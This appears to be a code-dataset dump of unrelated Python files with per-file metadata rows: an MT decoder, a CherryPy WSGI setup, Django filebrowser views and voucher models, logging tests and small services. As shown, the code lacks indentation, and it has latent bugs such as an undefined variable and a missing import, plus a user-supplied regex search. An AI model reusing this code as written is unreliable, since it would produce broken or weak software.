imgs, labels = data.get_variations(47)
cnt = 0
for img in imgs:
mat = np.zeros(img.shape, dtype=np.int)
h, w, _ = img.shape
for i in range(h):
for j in range(w):
mat[i][j][0] = round(img[i][j][2] * 255 + 122.675)
mat[i][j][1] = round(img[i][j][1] * 255 + 116.669)
mat[i][j][2] = round(img[i][j][0] * 255 + 104.008)
im = Image.fromarray(np.uint8(mat))
im.save('img-'+str(cnt)+'.jpg')
cnt += 1
|
apache-2.0
| 5,070,734,809,259,799,000
| 42.72449
| 149
| 0.502684
| false
| 3.046569
| false
| false
| false
|
query/mt-submissions
|
hw2-decoding/decode.py
|
1
|
7691
|
#!/usr/bin/env python
"""A translation decoder."""
from collections import defaultdict, namedtuple
import models
Hypothesis = namedtuple('Hypothesis',
['logprob', 'future_cost', 'coverage',
'lm_state', 'predecessor', 'candidate'])
def decode(tm, lm, source_sentence,
stack_size=1, max_reordering=None):
"""Return the most probable decoding of *source_sentence* under the
provided probabilistic translation and language models."""
# Compute the future cost table.
future_costs = {}
for segment_length in xrange(1, len(source_sentence) + 1):
for start in xrange(len(source_sentence) - segment_length + 1):
end = start + segment_length
future_costs[(start, end)] = float('-inf')
candidates = tm.get(source_sentence[start:end], [])
if candidates:
logprob = candidates[0].logprob
lm_state = tuple()
for target_word in candidates[0].english.split():
lm_state, word_logprob = lm.score(lm_state, target_word)
logprob += word_logprob
future_costs[(start, end)] = logprob
for mid in xrange(start + 1, end):
future_costs[(start, end)] = max(
future_costs[(start, mid)] + future_costs[(mid, end)],
future_costs[(start, end)])
# Actually start decoding.
initial = Hypothesis(0.0, future_costs[(0, len(source_sentence))],
(False,) * len(source_sentence),
lm.begin(), None, None)
# We add 1 here because we need to have stacks for both ends: 0 and
# len(source_sentence).
stacks = [{} for _ in xrange(len(source_sentence) + 1)]
stacks[0][lm.begin()] = initial
# Iterate over every stack but the last. It's not possible to add
# anything to a hypothesis in the last stack anyway, so we skip it.
for i, stack in enumerate(stacks[:-1]):
# Take only the best *stack_size* hypotheses. Using the sum of
# the log-probability and the future cost negatively impacts the
# model score (??).
hypotheses = sorted(stack.itervalues(),
key=lambda h: -h.logprob)[:stack_size]
for hypothesis in hypotheses:
# Save ourselves a couple of levels of indentation later on.
def untranslated_segments():
if max_reordering is None:
starts = xrange(len(source_sentence))
else:
starts = xrange(min(i + max_reordering,
len(source_sentence)))
for start in starts:
if hypothesis.coverage[start]:
continue
ends = xrange(start, len(source_sentence))
for end in ends:
if hypothesis.coverage[end]:
break
yield (start, end + 1)
# Iterate over blocks of untranslated source words.
for start, end in untranslated_segments():
source_phrase = source_sentence[start:end]
# Get all of the potential candidate translations.
candidates = tm.get(source_phrase, [])
# Translate unknown unigrams to themselves.
if not candidates and len(source_phrase) == 1:
candidates.append(models.phrase(source_phrase[0], 0.0))
for candidate in candidates:
logprob = hypothesis.logprob + candidate.logprob
# Make a new coverage vector with the appropriate
# elements set to True. This isn't pretty. Sorry.
coverage = (hypothesis.coverage[:start] +
(True,) * (end - start) +
hypothesis.coverage[end:])
# Find the future cost estimate for this hypothesis
# by summing over contiguous incomplete segments.
future_cost = 0.0
cost_start = None
for cost_i, covered in enumerate(coverage + (True,)):
if covered:
if cost_start is not None:
future_cost += \
future_costs[(cost_start, cost_i)]
cost_start = None
else:
if cost_start is None:
cost_start = cost_i
# Make a new LM state.
lm_state = hypothesis.lm_state
for target_word in candidate.english.split():
lm_state, word_logprob = \
lm.score(lm_state, target_word)
logprob += word_logprob
# Add the final transition probability if the end of
# this segment is also the end of the sentence.
if end == len(source_sentence):
logprob += lm.end(lm_state)
# If the new hypothesis is the best hypothesis for
# its state and number of completed words, push it
# onto the stack, replacing any that is present.
completed = sum(int(x) for x in coverage)
if (lm_state not in stacks[completed] or
(stacks[completed][lm_state].logprob +
stacks[completed][lm_state].future_cost) <
logprob + future_cost):
stacks[completed][lm_state] = Hypothesis(
logprob, future_cost, coverage,
lm_state, hypothesis, candidate)
# We don't need to specify a key, since we're looking for the best
# log-probability, and that's the first element of a hypothesis.
best = max(stacks[-1].itervalues())
current = best
decoding = []
while current.candidate:
decoding.insert(0, current.candidate.english)
current = current.predecessor
return tuple(decoding)
def main():
import argparse
parser = argparse.ArgumentParser(
description='A translation decoder.')
parser.add_argument(
'tm_path', metavar='TM',
help='path to translation model')
parser.add_argument(
'lm_path', metavar='LM',
help='path to language model')
parser.add_argument(
'input_file', metavar='INPUT', type=argparse.FileType('r'),
help='path to file containing sentences to decode')
parser.add_argument(
'-k', '--max-candidates', type=int, default=1,
help='maximum number of translation candidates to consider for '
'each phrase')
parser.add_argument(
'-r', '--max-reordering', type=int,
help='maximum number of source words that can be skipped '
'during reordering')
parser.add_argument(
'-s', '--stack-size', type=int, default=1,
help='maximum hypothesis stack size')
args = parser.parse_args()
tm = models.TM(args.tm_path, args.max_candidates)
lm = models.LM(args.lm_path)
for source_line in args.input_file:
source_sentence = tuple(source_line.split())
print ' '.join(decode(tm, lm, source_sentence,
stack_size=args.stack_size,
max_reordering=args.max_reordering))
if __name__ == '__main__':
main()
|
mit
| -7,950,587,443,624,482,000
| 45.896341
| 76
| 0.52854
| false
| 4.718405
| false
| false
| false
|
paolodoz/timesheet
|
embedded/modwsgi.py
|
1
|
1518
|
#!/usr/bin/env python
import cherrypy, logging
import sys, os
# Suppose this file in
installation_path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
sys.path.insert(0, installation_path)
from core.routes.routes import Routes
from core.config import conf_server, conf_static, conf_logging
def secureheaders():
headers = cherrypy.response.headers
headers['X-Frame-Options'] = 'DENY'
headers['X-XSS-Protection'] = '1; mode=block'
headers['Content-Security-Policy'] = "default-src='self'"
# Update configurations
# If log paths are absolute, move to current path
if not os.path.isabs(conf_server['log.access_file']):
conf_server['log.access_file'] = os.path.join(installation_path, conf_server['log.access_file'])
if not os.path.isabs(conf_server['log.error_file']):
conf_server['log.error_file'] = os.path.join(installation_path, conf_server['log.error_file'])
conf_server['environment'] = 'embedded'
cherrypy.config.update(conf_server)
if cherrypy.__version__.startswith('3.0') and cherrypy.engine.state == 0:
cherrypy.engine.start(blocking=False)
atexit.register(cherrypy.engine.stop)
for logname, loglevel in conf_logging.items():
logging_level = getattr(logging, loglevel)
cherrypy_log = getattr(cherrypy.log, logname)
cherrypy_log.setLevel(logging_level)
cherrypy.tools.secureheaders = cherrypy.Tool('before_finalize', secureheaders, priority=60)
routes = Routes()
application = cherrypy.Application(routes, config=conf_static)
|
gpl-2.0
| -6,801,214,810,711,781,000
| 35.142857
| 100
| 0.732543
| false
| 3.411236
| false
| false
| false
|
dwaiter/django-filebrowser-old
|
filebrowser/views.py
|
1
|
19478
|
# coding: utf-8
# general imports
import itertools, os, re
from time import gmtime, strftime
# django imports
from django.shortcuts import render_to_response, HttpResponse
from django.template import RequestContext as Context
from django.http import HttpResponseRedirect
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.cache import never_cache
from django.utils.translation import ugettext as _
from django.conf import settings
from django import forms
from django.core.urlresolvers import reverse
from django.core.exceptions import ImproperlyConfigured
from django.dispatch import Signal
from django.core.paginator import Paginator, InvalidPage, EmptyPage
try:
# django SVN
from django.views.decorators.csrf import csrf_exempt
except:
# django 1.1
from django.contrib.csrf.middleware import csrf_exempt
# filebrowser imports
from filebrowser.settings import *
from filebrowser.functions import path_to_url, sort_by_attr, get_path, get_file, get_version_path, get_breadcrumbs, get_filterdate, get_settings_var, handle_file_upload, convert_filename
from filebrowser.templatetags.fb_tags import query_helper
from filebrowser.base import FileObject
from filebrowser.decorators import flash_login_required
# Precompile regular expressions
filter_re = []
for exp in EXCLUDE:
filter_re.append(re.compile(exp))
for k,v in VERSIONS.iteritems():
exp = (r'_%s.(%s)') % (k, '|'.join(EXTENSION_LIST))
filter_re.append(re.compile(exp))
def browse(request):
"""
Browse Files/Directories.
"""
# QUERY / PATH CHECK
query = request.GET.copy()
path = get_path(query.get('dir', ''))
directory = get_path('')
q = request.GET.get('q')
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
if directory is None:
# The DIRECTORY does not exist, raise an error to prevent eternal redirecting.
raise ImproperlyConfigured, _("Error finding Upload-Folder. Maybe it does not exist?")
redirect_url = reverse("fb_browse") + query_helper(query, "", "dir")
return HttpResponseRedirect(redirect_url)
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
# INITIAL VARIABLES
results_var = {'results_total': 0, 'results_current': 0, 'delete_total': 0, 'images_total': 0, 'select_total': 0 }
counter = {}
for k,v in EXTENSIONS.iteritems():
counter[k] = 0
if q:
m_root = os.path.normpath(MEDIA_ROOT)
dirs = [
[(os.path.normpath(root)[len(m_root)+1:], f) for f in filenames]
for root, _subdirs, filenames in os.walk(abs_path)
]
dir_list = itertools.chain(*dirs)
else:
root = os.path.join(DIRECTORY, path)
dir_list = ((root, f) for f in os.listdir(abs_path))
files = []
for file_dir, file in dir_list:
# EXCLUDE FILES MATCHING VERSIONS_PREFIX OR ANY OF THE EXCLUDE PATTERNS
filtered = file.startswith('.')
for re_prefix in filter_re:
if re_prefix.search(file):
filtered = True
if filtered:
continue
results_var['results_total'] += 1
# CREATE FILEOBJECT
fileobject = FileObject(os.path.join(file_dir, file))
# FILTER / SEARCH
append = False
if fileobject.filetype == request.GET.get('filter_type', fileobject.filetype) and get_filterdate(request.GET.get('filter_date', ''), fileobject.date or 0):
append = True
if q and not re.compile(q.lower(), re.M).search(file.lower()):
append = False
# APPEND FILE_LIST
if append:
try:
# COUNTER/RESULTS
if fileobject.filetype == 'Image':
results_var['images_total'] += 1
if fileobject.filetype != 'Folder':
results_var['delete_total'] += 1
elif fileobject.filetype == 'Folder' and fileobject.is_empty:
results_var['delete_total'] += 1
if query.get('type') and query.get('type') in SELECT_FORMATS and fileobject.filetype in SELECT_FORMATS[query.get('type')]:
results_var['select_total'] += 1
elif not query.get('type'):
results_var['select_total'] += 1
except OSError:
# Ignore items that have problems
continue
else:
files.append(fileobject)
results_var['results_current'] += 1
# COUNTER/RESULTS
if fileobject.filetype:
counter[fileobject.filetype] += 1
# SORTING
query['o'] = request.GET.get('o', DEFAULT_SORTING_BY)
query['ot'] = request.GET.get('ot', DEFAULT_SORTING_ORDER)
folders = [f for f in files if f.filetype == 'Folder']
folders = sort_by_attr(folders, 'filename')
files = [f for f in files if f.filetype != 'Folder']
files = sort_by_attr(files, request.GET.get('o', DEFAULT_SORTING_BY))
if not request.GET.get('ot') and DEFAULT_SORTING_ORDER == "desc" or request.GET.get('ot') == "desc":
files.reverse()
p = Paginator(files, LIST_PER_PAGE)
try:
page_nr = request.GET.get('p', '1')
except:
page_nr = 1
try:
page = p.page(page_nr)
except (EmptyPage, InvalidPage):
page = p.page(p.num_pages)
return render_to_response('filebrowser/index.html', {
'dir': path,
'p': p,
'q': q,
'page': page,
'folders': folders,
'results_var': results_var,
'counter': counter,
'query': query,
'title': _(u'FileBrowser'),
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': ""
}, context_instance=Context(request))
browse = staff_member_required(never_cache(browse))
# mkdir signals
filebrowser_pre_createdir = Signal(providing_args=["path", "dirname"])
filebrowser_post_createdir = Signal(providing_args=["path", "dirname"])
def mkdir(request):
"""
Make Directory.
"""
from filebrowser.forms import MakeDirForm
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
if request.method == 'POST':
form = MakeDirForm(abs_path, request.POST)
if form.is_valid():
server_path = os.path.join(abs_path, form.cleaned_data['dir_name'])
try:
# PRE CREATE SIGNAL
filebrowser_pre_createdir.send(sender=request, path=path, dirname=form.cleaned_data['dir_name'])
# CREATE FOLDER
os.mkdir(server_path)
os.chmod(server_path, 0775)
# POST CREATE SIGNAL
filebrowser_post_createdir.send(sender=request, path=path, dirname=form.cleaned_data['dir_name'])
# MESSAGE & REDIRECT
msg = _('The Folder %s was successfully created.') % (form.cleaned_data['dir_name'])
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the new directory on top of the list
# remove filter in order to actually _see_ the new folder
# remove pagination
redirect_url = reverse("fb_browse") + query_helper(query, "ot=desc,o=date", "ot,o,filter_type,filter_date,q,p")
return HttpResponseRedirect(redirect_url)
except OSError, (errno, strerror):
if errno == 13:
form.errors['dir_name'] = forms.util.ErrorList([_('Permission denied.')])
else:
form.errors['dir_name'] = forms.util.ErrorList([_('Error creating folder.')])
else:
form = MakeDirForm(abs_path)
return render_to_response('filebrowser/makedir.html', {
'form': form,
'query': query,
'title': _(u'New Folder'),
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'New Folder')
}, context_instance=Context(request))
mkdir = staff_member_required(never_cache(mkdir))
def upload(request):
"""
Multipe File Upload.
"""
from django.http import parse_cookie
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
if path is None:
msg = _('The requested Folder does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
# SESSION (used for flash-uploading)
cookie_dict = parse_cookie(request.META.get('HTTP_COOKIE', ''))
engine = __import__(settings.SESSION_ENGINE, {}, {}, [''])
session_key = cookie_dict.get(settings.SESSION_COOKIE_NAME, None)
return render_to_response('filebrowser/upload.html', {
'query': query,
'title': _(u'Select files to upload'),
'settings_var': get_settings_var(),
'session_key': session_key,
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Upload')
}, context_instance=Context(request))
upload = staff_member_required(never_cache(upload))
@csrf_exempt
def _check_file(request):
"""
Check if file already exists on the server.
"""
from django.utils import simplejson
folder = request.POST.get('folder')
fb_uploadurl_re = re.compile(r'^.*(%s)' % reverse("fb_upload"))
folder = fb_uploadurl_re.sub('', folder)
fileArray = {}
if request.method == 'POST':
for k,v in request.POST.items():
if k != "folder":
v = convert_filename(v)
if os.path.isfile(os.path.join(MEDIA_ROOT, DIRECTORY, folder, v)):
fileArray[k] = v
return HttpResponse(simplejson.dumps(fileArray))
# upload signals
filebrowser_pre_upload = Signal(providing_args=["path", "file"])
filebrowser_post_upload = Signal(providing_args=["path", "file"])
@csrf_exempt
@flash_login_required
def _upload_file(request):
"""
Upload file to the server.
"""
from django.core.files.move import file_move_safe
if request.method == 'POST':
folder = request.POST.get('folder')
fb_uploadurl_re = re.compile(r'^.*(%s)' % reverse("fb_upload"))
folder = fb_uploadurl_re.sub('', folder)
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, folder)
if request.FILES:
filedata = request.FILES['Filedata']
filedata.name = convert_filename(filedata.name)
# PRE UPLOAD SIGNAL
filebrowser_pre_upload.send(sender=request, path=request.POST.get('folder'), file=filedata)
# HANDLE UPLOAD
uploadedfile = handle_file_upload(abs_path, filedata)
# MOVE UPLOADED FILE
# if file already exists
if os.path.isfile(os.path.join(MEDIA_ROOT, DIRECTORY, folder, filedata.name)):
old_file = os.path.join(abs_path, filedata.name)
new_file = os.path.join(abs_path, uploadedfile)
file_move_safe(new_file, old_file)
# POST UPLOAD SIGNAL
filebrowser_post_upload.send(sender=request, path=request.POST.get('folder'), file=FileObject(os.path.join(DIRECTORY, folder, filedata.name)))
return HttpResponse('True')
#_upload_file = flash_login_required(_upload_file)
# delete signals
filebrowser_pre_delete = Signal(providing_args=["path", "filename"])
filebrowser_post_delete = Signal(providing_args=["path", "filename"])
def delete(request):
"""
Delete existing File/Directory.
When trying to delete a Directory, the Directory has to be empty.
"""
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
msg = ""
if request.GET:
if request.GET.get('filetype') != "Folder":
relative_server_path = os.path.join(DIRECTORY, path, filename)
try:
# PRE DELETE SIGNAL
filebrowser_pre_delete.send(sender=request, path=path, filename=filename)
# DELETE IMAGE VERSIONS/THUMBNAILS
for version in VERSIONS:
try:
os.unlink(os.path.join(MEDIA_ROOT, get_version_path(relative_server_path, version)))
except:
pass
# DELETE FILE
os.unlink(os.path.join(abs_path, filename))
# POST DELETE SIGNAL
filebrowser_post_delete.send(sender=request, path=path, filename=filename)
# MESSAGE & REDIRECT
msg = _('The file %s was successfully deleted.') % (filename.lower())
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename,filetype")
return HttpResponseRedirect(redirect_url)
except OSError:
# todo: define error message
msg = OSError
else:
try:
# PRE DELETE SIGNAL
filebrowser_pre_delete.send(sender=request, path=path, filename=filename)
# DELETE FOLDER
os.rmdir(os.path.join(abs_path, filename))
# POST DELETE SIGNAL
filebrowser_post_delete.send(sender=request, path=path, filename=filename)
# MESSAGE & REDIRECT
msg = _('The folder %s was successfully deleted.') % (filename.lower())
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename,filetype")
return HttpResponseRedirect(redirect_url)
except OSError:
# todo: define error message
msg = OSError
if msg:
request.user.message_set.create(message=msg)
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'file': request.GET.get('filename', ''),
'query': query,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, dir_name),
'breadcrumbs_title': ""
}, context_instance=Context(request))
delete = staff_member_required(never_cache(delete))
# rename signals
filebrowser_pre_rename = Signal(providing_args=["path", "filename", "new_filename"])
filebrowser_post_rename = Signal(providing_args=["path", "filename", "new_filename"])
def rename(request):
"""
Rename existing File/Directory.
Includes renaming existing Image Versions/Thumbnails.
"""
from filebrowser.forms import RenameForm
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
file_extension = os.path.splitext(filename)[1].lower()
if request.method == 'POST':
form = RenameForm(abs_path, file_extension, request.POST)
if form.is_valid():
relative_server_path = os.path.join(DIRECTORY, path, filename)
new_filename = form.cleaned_data['name'] + file_extension
new_relative_server_path = os.path.join(DIRECTORY, path, new_filename)
try:
# PRE RENAME SIGNAL
filebrowser_pre_rename.send(sender=request, path=path, filename=filename, new_filename=new_filename)
# DELETE IMAGE VERSIONS/THUMBNAILS
# regenerating versions/thumbs will be done automatically
for version in VERSIONS:
try:
os.unlink(os.path.join(MEDIA_ROOT, get_version_path(relative_server_path, version)))
except:
pass
# RENAME ORIGINAL
os.rename(os.path.join(MEDIA_ROOT, relative_server_path), os.path.join(MEDIA_ROOT, new_relative_server_path))
# POST RENAME SIGNAL
filebrowser_post_rename.send(sender=request, path=path, filename=filename, new_filename=new_filename)
# MESSAGE & REDIRECT
msg = _('Renaming was successful.')
request.user.message_set.create(message=msg)
redirect_url = reverse("fb_browse") + query_helper(query, "", "filename")
return HttpResponseRedirect(redirect_url)
except OSError, (errno, strerror):
form.errors['name'] = forms.util.ErrorList([_('Error.')])
else:
form = RenameForm(abs_path, file_extension)
return render_to_response('filebrowser/rename.html', {
'form': form,
'query': query,
'file_extension': file_extension,
'title': _(u'Rename "%s"') % filename,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Rename')
}, context_instance=Context(request))
rename = staff_member_required(never_cache(rename))
def versions(request):
"""
Show all Versions for an Image according to ADMIN_VERSIONS.
"""
# QUERY / PATH CHECK
query = request.GET
path = get_path(query.get('dir', ''))
filename = get_file(query.get('dir', ''), query.get('filename', ''))
if path is None or filename is None:
if path is None:
msg = _('The requested Folder does not exist.')
else:
msg = _('The requested File does not exist.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(reverse("fb_browse"))
abs_path = os.path.join(MEDIA_ROOT, DIRECTORY, path)
return render_to_response('filebrowser/versions.html', {
'original': path_to_url(os.path.join(DIRECTORY, path, filename)),
'query': query,
'title': _(u'Versions for "%s"') % filename,
'settings_var': get_settings_var(),
'breadcrumbs': get_breadcrumbs(query, path),
'breadcrumbs_title': _(u'Versions for "%s"') % filename
}, context_instance=Context(request))
versions = staff_member_required(never_cache(versions))
|
bsd-3-clause
| -3,435,572,908,903,204,000
| 38.509128
| 186
| 0.599446
| false
| 3.960553
| false
| false
| false
|
KSchopmeyer/smipyping
|
tests/test_logging.py
|
1
|
3914
|
#!/usr/bin/env python
# (C) Copyright 2017 Inova Development Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test the components of the simpleping.py module
"""
from __future__ import absolute_import, print_function
import os
import unittest
import logging
# from testfixtures import log_capture
from smipyping._logging import get_logger, SmiPypingLoggers
VERBOSE = False
# Location of any test scripts for testing wbemcli.py
SCRIPT_DIR = os.path.dirname(__file__)
LOG_FILE_NAME = 'test_logging.log'
TEST_OUTPUT_LOG = '%s/%s' % (SCRIPT_DIR, LOG_FILE_NAME)
# TODO add test of actual logging.
class BaseLoggingTests(unittest.TestCase):
"""Base class for logging unit tests"""
def setUp(self):
SmiPypingLoggers.reset()
if os.path.isfile(TEST_OUTPUT_LOG):
os.remove(TEST_OUTPUT_LOG)
def tearDown(self):
# Close any open logging files
# Windows log files be closed to be removed.
if os.path.isfile(TEST_OUTPUT_LOG):
logger = logging.getLogger('testlogger')
if logger.handlers:
handlers = logger.handlers[:]
for handler in handlers:
handler.close()
logger.removeHandler(handler)
os.remove(TEST_OUTPUT_LOG)
def loadLogfile(self):
if os.path.isfile(TEST_OUTPUT_LOG):
with open(TEST_OUTPUT_LOG) as f:
lines = f.read().splitlines()
return lines
return None
class TestGetLogger(unittest.TestCase):
"""All test cases for get_logger()."""
def test_root_logger(self):
"""Test that get_logger('') returns the Python root logger and has at
least one handler."""
py_logger = logging.getLogger()
my_logger = get_logger('')
self.assertTrue(isinstance(my_logger, logging.Logger))
self.assertEqual(my_logger, py_logger)
self.assertTrue(len(my_logger.handlers) >= 1,
"Unexpected list of logging handlers: %r" %
my_logger.handlers)
def test_foo_logger(self):
"""Test that get_logger('foo') returns the Python logger 'foo'
and has at least one handler."""
py_logger = logging.getLogger('foo')
my_logger = get_logger('foo')
self.assertTrue(isinstance(my_logger, logging.Logger))
self.assertEqual(my_logger, py_logger)
self.assertTrue(len(my_logger.handlers) >= 1,
"Unexpected list of logging handlers: %r" %
my_logger.handlers)
class TestLoggerCreate(BaseLoggingTests):
""" Test the SmipypingLoggers.create_logger method."""
def test_create_single_logger1(self):
"""
Create a simple logger
"""
SmiPypingLoggers.prog = 'test_logging'
SmiPypingLoggers.create_logger('testlogger', log_dest='file',
log_filename=TEST_OUTPUT_LOG,
log_level='debug')
if VERBOSE:
print('smipyping_loggers dict %s' % SmiPypingLoggers.loggers)
expected_result = \
{'test_logging.testlogger': ('debug', 'file',
TEST_OUTPUT_LOG)}
self.assertEqual(SmiPypingLoggers.loggers, expected_result)
if __name__ == '__main__':
unittest.main()
|
mit
| 7,747,978,183,615,586,000
| 31.616667
| 77
| 0.619315
| false
| 4.077083
| true
| false
| false
|
onepercentclub/onepercentclub-site
|
apps/vouchers/models.py
|
1
|
4574
|
import random
from django.conf import settings
from django.db import models
from django.utils.translation import ugettext as _
from django_extensions.db.fields import ModificationDateTimeField, CreationDateTimeField
from djchoices import DjangoChoices, ChoiceItem
from .mails import mail_new_voucher
class VoucherStatuses(DjangoChoices):
new = ChoiceItem('new', label=_("New"))
paid = ChoiceItem('paid', label=_("Paid"))
cancelled = ChoiceItem('cancelled', label=_("Cancelled"))
cashed = ChoiceItem('cashed', label=_("Cashed"))
cashed_by_proxy = ChoiceItem('cashed_by_proxy', label=_("Cashed by us"))
class Voucher(models.Model):
class VoucherLanguages(DjangoChoices):
en = ChoiceItem('en', label=_("English"))
nl = ChoiceItem('nl', label=_("Dutch"))
amount = models.PositiveIntegerField(_("Amount"))
currency = models.CharField(_("Currency"), max_length=3, default='EUR')
language = models.CharField(_("Language"), max_length=2, choices=VoucherLanguages.choices, default=VoucherLanguages.en)
message = models.TextField(_("Message"), blank=True, default="", max_length=500)
code = models.CharField(_("Code"), blank=True, default="", max_length=100)
status = models.CharField(_("Status"), max_length=20, choices=VoucherStatuses.choices, default=VoucherStatuses.new, db_index=True)
created = CreationDateTimeField(_("Created"))
updated = ModificationDateTimeField(_("Updated"))
sender = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Sender"), related_name="sender", null=True, blank=True)
sender_email = models.EmailField(_("Sender email"))
sender_name = models.CharField(_("Sender name"), blank=True, default="", max_length=100)
receiver = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Receiver"), related_name="receiver", null=True, blank=True)
receiver_email = models.EmailField(_("Receiver email"))
receiver_name = models.CharField(_("Receiver name"), blank=True, default="", max_length=100)
order = models.ForeignKey('fund.Order', verbose_name=_("Order"), related_name='vouchers', null=True)
class Meta:
# Note: This can go back to 'Voucher' when we figure out a proper way to do EN -> EN translations for branding.
verbose_name = _("Gift Card")
verbose_name_plural = _("Gift Cards")
def __unicode__(self):
code = "NEw"
if self.code:
code = self.code
return code
class CustomVoucherRequest(models.Model):
class CustomVoucherTypes(DjangoChoices):
card = ChoiceItem('card', label=_("Card"))
digital = ChoiceItem('digital', label=_("Digital"))
unknown = ChoiceItem('unknown', label=_("Unknown"))
class CustomVoucherStatuses(DjangoChoices):
new = ChoiceItem('new', label=_("New"))
in_progress = ChoiceItem('in progress', label=_("In progress"))
finished = ChoiceItem('finished', label=_("Finished"))
value = models.CharField(verbose_name=_("Value"), max_length=100, blank=True, default="")
number = models.PositiveIntegerField(_("Number"))
contact = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_("Contact member"), null=True)
contact_name = models.CharField(verbose_name=_("Contact email"), max_length=100, blank=True, default="")
contact_email = models.EmailField(verbose_name=_("Contact email"), blank=True, default="")
contact_phone = models.CharField(verbose_name=_("Contact phone"), max_length=100, blank=True, default="")
organization = models.CharField(verbose_name=_("Organisation"), max_length=200, blank=True, default="")
message = models.TextField(_("message"), default="", max_length=500, blank=True)
type = models.CharField(_("type"), max_length=20, choices=CustomVoucherTypes.choices, default=CustomVoucherTypes.unknown)
status = models.CharField(_("status"), max_length=20, choices=CustomVoucherStatuses.choices, default=CustomVoucherStatuses.new, db_index=True)
created = CreationDateTimeField(_("created"))
def process_voucher_order_in_progress(voucher):
def generate_voucher_code():
# Upper case letters without D, O, L and I; numbers without 0 and 1.
char_set = 'ABCEFGHJKMNPQRSTUVWXYZ23456789'
return ''.join(random.choice(char_set) for i in range(8))
code = generate_voucher_code()
while Voucher.objects.filter(code=code).exists():
code = generate_voucher_code()
voucher.code = code
voucher.status = VoucherStatuses.paid
voucher.save()
mail_new_voucher(voucher)
|
bsd-3-clause
| 1,365,753,965,112,462,600
| 46.645833
| 146
| 0.691517
| false
| 4.005254
| false
| false
| false
|
ushatil/wellness-tracker
|
ws/wellspring/services/vest_service.py
|
1
|
1420
|
import logging
from wellspring.models import VestSection, VestSubSection
LOGGER = logging.getLogger(__name__)
VEST_SECTIONS = {
"EQUILIBRIUM" : ["SCHOOL", "SELF", "HOME", "WORK"],
"SUPPORT" : ["PROFESSIONALS", "FAMILY", "FRIENDS", "COLLEAGUES"],
"LIFESTYLE" : ["DIET", "EXERCISE", "MEDITATION", "RECREATION"]
}
def add_section(name):
LOGGER.debug("Adding VestSection: " + name)
result = VestSection(section_name=name)
result.save()
return result
def add_subsection(section_name, subsection_name):
LOGGER.debug("Adding VestSubSection: " + section_name + ":" + subsection_name)
vest_section = get_by_name_vest_section(section_name)
result = VestSubSection(vest_section=vest_section, subsection_name=subsection_name)
result.save()
return result
def get_all_vest_section():
LOGGER.debug("Getting all VestSections")
return list(VestSection.objects.all())
def get_all_vest_subsection():
LOGGER.debug("Getting all VestSubSections")
return list(VestSubSection.objects.all())
def get_by_name_vest_section(name):
LOGGER.debug("Getting VestSection by name: " + name)
return VestSection.objects.get(section_name = name)
def get_by_name_vest_subsection(name):
LOGGER.debug("Getting VestSubSection by name: " + name)
return VestSubSection.objects.get(subsection_name = name)
|
mit
| 4,386,219,538,674,025,000
| 35.435897
| 87
| 0.671831
| false
| 3.356974
| false
| false
| false
|
frdwrd/bifocal
|
bifocal/models/transaction.py
|
1
|
3366
|
# Copyright (c) 2013-2015, Vehbi Sinan Tunalioglu <vst@vsthost.com>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
